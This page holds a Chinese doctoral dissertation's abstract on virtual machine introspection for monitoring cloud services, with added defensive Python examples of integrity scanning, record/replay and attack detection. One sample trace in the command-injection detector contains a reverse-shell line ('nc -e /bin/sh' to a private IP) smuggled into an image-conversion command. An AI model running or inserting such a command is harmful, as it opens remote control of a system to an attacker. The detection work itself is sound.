
Key Technology Research On Service Monitoring Oriented For Controlled Cloud

Posted on: 2016-02-22
Degree: Doctor
Type: Dissertation
Country: China
Candidate: J Lin
Full Text: PDF
GTID: 1108330482457864
Subject: Computer Science and Technology
Abstract/Summary:
With the continuing development of cloud computing, cloud security is becoming ever more important. Cloud computing benefits tenants and ordinary users, but it also introduces security problems that threaten the interests of every party and hinder the adoption of cloud computing. In a cloud environment the threat may come from two directions: the service provider and ordinary users. The multi-tenant nature of cloud computing may admit untrusted tenants who use the cloud platform to offer fake services, such as phishing sites, that steal users' personal or account information; a user who accesses such a service is about to hand personal information to a malicious tenant. The Internet also contains a large number of unknown users, among them malicious ones, who may attack tenant services and so pose a security risk. An attacker will attack tenant services by various means, for example by exploiting a vulnerability the tenant has not found. After breaking into the tenant's system, the attacker runs malicious programs in the tenant's environment, deletes or modifies important files, and so on. More dangerous still, the attacker may abuse the tenant's service itself, for instance using the tenant's mail service to send spam. Infrastructure clouds provide virtualization services, and given the scale of a cloud platform, an attacker who controls many virtualization servers can launch large-scale attacks such as DDoS or the spreading of malicious programs, which also reach end users. Researching how to build a service monitoring-oriented controllable cloud is therefore necessary.

Cloud service providers have the highest level of control over the cloud platform.
They do not want their platform to be under malicious attack, nor do they want it used to do harm, so effective methods are needed to build a controlled cloud platform in which the provider can respond in time when a threat occurs. Virtualization is the core technology of infrastructure cloud computing, and tenant services reside in virtual machines. An effective way to monitor services is therefore Virtual Machine Introspection (VMI). "Service" is used here in a general sense: it may refer to services offered by the cloud service provider or to services offered by tenants, because whatever the service is, it ultimately runs inside a virtual machine. Monitoring the virtual machine is meant to prevent tenants or users from running malicious code in the cloud. This thesis adopts virtual machine introspection for service monitoring.

This thesis studies virtual machine introspection on Linux in an infrastructure-cloud environment. The environment accommodates different Linux host operating systems, and the guest operating systems are mainly Linux and Windows. Taking the Xen virtual machine monitor as the research object, the thesis analyzes and designs a virtual machine monitoring architecture with several monitoring granularities: process monitoring, module monitoring, memory operation monitoring and monitoring of other virtual machine state. Process monitoring must report the process ID, process name and related process information; module monitoring must report the module name and related module information; memory operation monitoring must report read and write operations on memory pages; and other state monitoring must report information such as the state of the virtual processors.
The monitored content is displayed in a suitable form and at the same time stored on disk as a log; logging does not noticeably affect the virtual machine. The thesis tests the monitoring software, including performance tests such as time consumed and effectiveness tests such as monitoring accuracy, and carries out a theoretical analysis. The virtual machine monitor and the monitoring software are integrated into an infrastructure cloud platform, giving a prototype of a service monitoring-oriented controllable cloud platform that can be deployed in a real environment.

The research focuses on virtual machine introspection, which monitors the virtual machine from outside it. Compared with traditional monitoring methods, its characteristics and novelty are as follows.

The monitoring software is not easily attacked. Traditional service monitoring is mostly host-based: the monitoring software is installed inside the monitored operating system. If malicious tenants or users gain control of that system, the monitoring software sits in an unsafe environment, is easily discovered, and is then relatively easy to disable. If instead the monitoring software is installed outside the virtual machine, it is not easily found by the attacker, because the virtual machine monitor isolates virtual machines into separate domains that cannot affect each other. Even an attacker who has compromised the virtual machine's operating system cannot easily damage the monitoring software, much less threaten the entire cloud platform.

For the inside of the virtual machine, monitoring is completely transparent.
Because the monitoring software lives outside the virtual machine and the guest operating system needs no modification, programs inside the virtual machine run exactly as they would on a physical machine. The monitoring software obtains information about the virtual machine through the interface provided by the virtual machine monitor, without affecting the programs running inside it, and because of the isolation provided by the virtual machine monitor those programs cannot affect the monitor in turn.

Data gained from monitoring provides more accurate evidence for digital forensics. An important means of digital forensics is acquiring the system memory image, which reflects the complete running state of the machine. With traditional monitoring methods the monitoring software itself occupies memory, so the acquired image also contains the monitoring software's own data. With virtual machine introspection the virtual machine is monitored from outside and its memory is used by the guest alone, so the acquired image contains only the virtual machine's internal state and no unrelated information.

Monitoring is performed at several granularities. In current monitoring research the monitored content is usually single-purpose, focusing on one aspect such as processes alone. Such monitoring cannot connect a series of related actions, which hampers reasoning about service behavior. This thesis combines process monitoring, module monitoring, memory operation monitoring and other sources so that service events can be replayed as completely as possible.

Little modification of the virtual machine monitor is needed. Most research on virtual machine monitoring makes many changes to the virtual machine monitor itself.
Such changes depend too heavily on the virtual machine monitor, which is not conducive to upgrading it. The research in this thesis therefore makes no major changes to the virtual machine monitor and instead uses the interfaces it already provides, keeping the coupling low.

This thesis studies the key technologies for constructing a service monitoring-oriented controlled cloud. The specific work falls into the following areas.

Integrity measurement of the virtual machine's runtime environment. Whether a program or file has been tampered with is tested through integrity measurement. The traditional approach installs the measurement software inside the measured system, and when a program or file is loaded into memory it is measured by that software. But once an attacker has intruded successfully, he can subvert the integrity measurement software along with the rest of the system. To address this problem, the thesis proposes an integrity measurement method based on virtual machine introspection, which measures applications inside the virtual machine from outside it and so isolates the measurement software from the measured system. The method works by scanning rather than by intercepting system calls, and so avoids a large performance overhead. The experimental results show that its performance is better than that of the system-call interception approach: in the UnixBench experiment the overhead introduced on Execl Throughput, Process Creation and Shell Scripts (8 concurrent) is 0.22%, 3.62% and 1.30% respectively, lower than the overhead introduced by HIMA.
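As an added illustration of the scanning approach (example code written for this page, not the thesis's implementation, and it does not use Xen's interfaces): the guest state below is a constructed in-memory structure standing in for what a VMI tool would read from guest memory through the hypervisor. The measurement runs entirely outside the "guest", compares the hash of each mapped text segment with a baseline taken from the tenant's golden image, and flags both binaries whose in-memory code differs from the baseline and executables that are not in the baseline at all. Paths, segment contents and baseline values are made up for the example.

```python
"""Scan-based integrity measurement over a guest memory snapshot.

Added example, not the thesis's code. The guest state is a constructed
structure standing in for what a VMI tool reads from guest memory; the
measurement logic runs outside the "guest" and never executes inside it.
"""
import hashlib
from dataclasses import dataclass


@dataclass
class Mapping:
    path: str    # backing file of an executable mapping in the guest
    code: bytes  # contents of the mapped text segment as read from guest memory


@dataclass
class Process:
    pid: int
    name: str
    mappings: list


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Known-good measurements, e.g. taken from the tenant's golden image at
# provisioning time. Contents are made up for the example.
GOLDEN = {
    "/usr/sbin/sshd": sha256(b"SSHD-TEXT-v1"),
    "/usr/lib/libc.so": sha256(b"LIBC-TEXT-v1"),
    "/usr/bin/nginx": sha256(b"NGINX-TEXT-v1"),
}


def measure(processes, golden=GOLDEN):
    """Return (pid, path, verdict) for every executable mapping in the snapshot.

    verdict is 'ok', 'tampered' (known path, hash differs: patched in memory or
    a replaced binary) or 'unknown' (path not in the baseline: a dropped
    binary or an injected shared library).
    """
    findings = []
    for proc in processes:
        for m in proc.mappings:
            digest = sha256(m.code)
            expected = golden.get(m.path)
            if expected is None:
                verdict = "unknown"
            elif digest == expected:
                verdict = "ok"
            else:
                verdict = "tampered"
            findings.append((proc.pid, m.path, verdict))
    return findings


def violations(processes, golden=GOLDEN):
    """Only the findings that need an operator's attention."""
    return [f for f in measure(processes, golden) if f[2] != "ok"]


# Constructed snapshot: a clean sshd that has an unlisted library mapped into
# it, and an nginx whose text segment was modified after it started.
SNAPSHOT = [
    Process(22, "sshd", [Mapping("/usr/sbin/sshd", b"SSHD-TEXT-v1"),
                         Mapping("/usr/lib/libc.so", b"LIBC-TEXT-v1"),
                         Mapping("/tmp/.x/evil.so", b"HOOK-CODE")]),
    Process(31, "nginx", [Mapping("/usr/bin/nginx", b"NGINX-TEXT-v1-patched"),
                          Mapping("/usr/lib/libc.so", b"LIBC-TEXT-v1")]),
]

if __name__ == "__main__":
    for pid, path, verdict in violations(SNAPSHOT):
        print(f"pid {pid}: {path}: {verdict}")
```

Because the scan reads guest memory rather than hooking every `execve`, it also catches in-memory patching of a process that was clean when it loaded, which load-time measurement misses; the trade-off is that a payload can run between two scans, so the scan interval bounds the detection delay.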
Detection of non-tampering attacks in the virtual machine. Integrity measurement detects whether a program has been tampered with, but some attacks do not modify the program at all. The thesis studies this class of non-tampering attacks, specifically binary code injection, data manipulation and command injection, and designs a detection method for each: system-call monitoring for binary code injection, memory write monitoring for data manipulation, and scanning for special strings for command injection. The experimental results show that these methods detect non-tampering attacks effectively at low cost; in the database test, for example, the overhead introduced by system-call monitoring is below 2% and that introduced by data write monitoring below 3%.

Record and replay of virtual machine behavior. Malware analysis places suspicious software into an analysis system and records its behavior by fine-grained monitoring, such as system-call-level or instruction-level recording. For behavior that involves non-deterministic events, however, this kind of analysis is not precise enough. The thesis designs a record and replay architecture for virtual machine behavior that relies on hardware virtualization features, avoiding the performance cost of dynamic binary translation. The recording component is placed in the virtual machine monitor to avoid the cost of frequent context switches. During recording the architecture logs only the information required for replay and the non-deterministic events; deterministic events are not recorded. The experimental results show that the method records and replays I/O events and that the overhead measured in the performance tests is low.
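The principle of logging only non-deterministic events, as an added example (Python written for this page; the thesis's recorder sits inside the VMM and uses hardware virtualization, which a user-space script cannot reproduce, so this models the logging discipline, not the mechanism). The "guest" is a function whose only non-deterministic inputs, network reads and clock reads, arrive through an injected source object. The recorder logs just those values; the replayer feeds them back in order and refuses to continue if the replayed execution asks for a different kind of event than the log holds, which is how divergence between recording and replay is caught. The class names and the packet/clock event types are assumptions of the example.

```python
"""Record/replay of a deterministic computation driven by non-deterministic inputs.

Added example, not the thesis's code. The workload's only non-determinism is
what it obtains from the source object; the recorder captures exactly that and
nothing else, and replay recomputes all deterministic work.
"""
import hashlib
import random
import time


class LiveSource:
    """Non-deterministic inputs of a live run: network reads and clock reads."""

    def __init__(self, rng_seed=None):
        self._rng = random.Random(rng_seed)   # stands in for a real socket

    def read_packet(self) -> bytes:
        return bytes(self._rng.getrandbits(8) for _ in range(4))

    def now(self) -> float:
        return time.time()


class Recorder:
    """Wraps a source and appends each non-deterministic value to a log."""

    def __init__(self, inner):
        self._inner = inner
        self.log = []   # entries are (event_kind, value)

    def read_packet(self):
        v = self._inner.read_packet()
        self.log.append(("packet", v))
        return v

    def now(self):
        v = self._inner.now()
        self.log.append(("clock", v))
        return v


class Replayer:
    """Serves logged values in order; any deviation from the log is an error."""

    def __init__(self, log):
        self._log = list(log)
        self._i = 0

    def _next(self, expected_kind):
        if self._i >= len(self._log):
            raise RuntimeError("replay log exhausted")
        kind, value = self._log[self._i]
        if kind != expected_kind:
            raise RuntimeError(f"divergence: expected {expected_kind}, log has {kind}")
        self._i += 1
        return value

    def read_packet(self):
        return self._next("packet")

    def now(self):
        return self._next("clock")


def guest_workload(src, n_packets=3):
    """Deterministic given its inputs: hashes packets and reports elapsed time."""
    start = src.now()
    h = hashlib.sha256()
    total = 0
    for _ in range(n_packets):
        pkt = src.read_packet()
        h.update(pkt)
        total += sum(pkt)          # deterministic work: recomputed, never logged
    elapsed = src.now() - start
    return {"digest": h.hexdigest(), "bytes_sum": total, "elapsed": elapsed}


def record_run(n_packets=3):
    """Run live under the recorder; return the result and the event log."""
    rec = Recorder(LiveSource())
    return guest_workload(rec, n_packets), rec.log


def replay_run(log, n_packets=3):
    """Re-execute the workload from the log alone, with no live source."""
    return guest_workload(Replayer(log), n_packets)


if __name__ == "__main__":
    result, log = record_run()
    print(f"recorded {len(log)} non-deterministic events")
    print("replay identical:", replay_run(log) == result)
```

The log holds five entries for a three-packet run (two clock reads and three packets) regardless of how much deterministic computation sits between them, which is the property that keeps recording overhead low; a replay that consumes more events than were logged, or asks for an event of the wrong kind, stops with an error instead of silently producing a different execution.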
In the UnixBench experiment the overall overhead introduced during recording is very low; the two tests with the highest overhead are Execl Throughput and Process Creation, at 2.55% and 2.62% respectively.

Detection of the state of distributed virtual machines. A rootkit lets an attacker hide in the system and install a back door, and an attacker who uses a rootkit to modify kernel data poses a serious threat to the system. In addition, a cloud platform is highly scalable and runs many virtual servers; a single detection method cannot meet the demand for detection at that scale, so a unified platform for monitoring the cloud platform's services is needed, and dispersed log data also makes intuitive analysis difficult. To solve these problems the thesis designs a distributed virtual machine state detection architecture in which the data recorded at each physical node is sent to a unified data analysis platform. For logging, it designs a user-mode logger and a kernel-mode logger.
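Returning to the detection of non-tampering attacks described earlier, here are the three detection ideas (system-call monitoring for binary code injection, write monitoring for data manipulation, string scanning for command injection) as an added example written for this page, not the thesis's implementation. The events are constructed records of the kind a VMI monitor could derive from a Linux guest: system-call traps carrying the user-space instruction pointer, trapped writes to watched pages, and the argv of exec-family calls. The process, its memory map, the watched range, the addresses and the trace are all made up for the example, and the exact criteria in each detector are this example's choices rather than the thesis's.

```python
"""Detectors for attacks that leave program code intact.

Added example, not the thesis's code. Events are constructed records standing
in for what a VMI monitor could derive from a guest; all addresses and ranges
are invented for the example.
"""
import re

# Constructed memory map of pid 1042 (a web worker): (start, end, perms, backing).
VMAS = [
    (0x400000, 0x480000, "r-x", "/usr/bin/nginx"),          # text
    (0x680000, 0x690000, "rw-", "/usr/bin/nginx"),          # data/bss
    (0x560000000000, 0x560000021000, "rw-", "[heap]"),
    (0x7ffd12340000, 0x7ffd12361000, "rw-", "[stack]"),
]
# Data that must not change after initialisation: here a parsed config block
# holding the upstream addresses and the uid the worker drops to (assumed).
WATCHED = [(0x680100, 0x680200, "worker_config")]


def vma_for(addr):
    for vma in VMAS:
        if vma[0] <= addr < vma[1]:
            return vma
    return None


def check_syscall(ev):
    """Binary code injection: the system call was issued from an address that is
    not inside a non-writable executable mapping, e.g. shellcode on the stack."""
    vma = vma_for(ev["ip"])
    if vma is None:
        return "syscall from unmapped address"
    _, _, perms, backing = vma
    if "w" in perms or "x" not in perms:
        return f"syscall {ev['nr']} issued from {backing} ({perms})"
    return None


def check_write(ev):
    """Data manipulation: any write into a watched range after the range was
    armed; legitimate code never writes there once initialisation is done."""
    for start, end, label in WATCHED:
        if start <= ev["addr"] < end:
            return f"write to {label} at {ev['addr']:#x} from ip {ev['ip']:#x}"
    return None


SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}
META = re.compile(r"(;|\|\||&&|\||`|\$\()")


def check_exec(ev):
    """Command injection: a `sh -c` whose command string chains a second command
    with shell metacharacters, the usual shape of injected input."""
    argv = ev["argv"]
    if len(argv) >= 3 and argv[0] in SHELLS and argv[1] == "-c":
        if META.search(argv[2]):
            return f"shell command with metacharacters: {argv[2]!r}"
    return None


DETECTORS = {"syscall": check_syscall, "write": check_write, "exec": check_exec}


def scan(events):
    """Return (event index, alert text) for every event a detector flags."""
    alerts = []
    for i, ev in enumerate(events):
        msg = DETECTORS[ev["type"]](ev)
        if msg:
            alerts.append((i, msg))
    return alerts


# Constructed trace: a benign read from the text segment, a write into the
# armed config block, a benign exec, a syscall issued from the stack, and a
# shell invocation carrying an injected second command.
TRACE = [
    {"type": "syscall", "nr": 0, "ip": 0x401234, "pid": 1042},
    {"type": "write", "addr": 0x680140, "ip": 0x402000, "pid": 1042},
    {"type": "exec", "argv": ["/usr/bin/logrotate", "/etc/logrotate.conf"]},
    {"type": "syscall", "nr": 59, "ip": 0x7ffd12340420, "pid": 1042},
    {"type": "exec", "argv": ["/bin/sh", "-c",
                              "convert in.png out.jpg; nc -e /bin/sh 10.0.0.5 4444"]},
]

if __name__ == "__main__":
    for idx, msg in scan(TRACE):
        print(f"event {idx}: {msg}")
```

Two caveats a deployment has to handle: the watched range must be armed only after the guest has finished writing it legitimately, otherwise initialisation itself raises alerts, and the string scanner trades precision for speed, since a legitimate pipeline in a cron job looks the same to it as injected input, so its alerts are best correlated with the other two detectors rather than acted on alone.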
Keywords/Search Tags: cloud computing, virtual machine, monitoring, security intrusion detection, runtime environment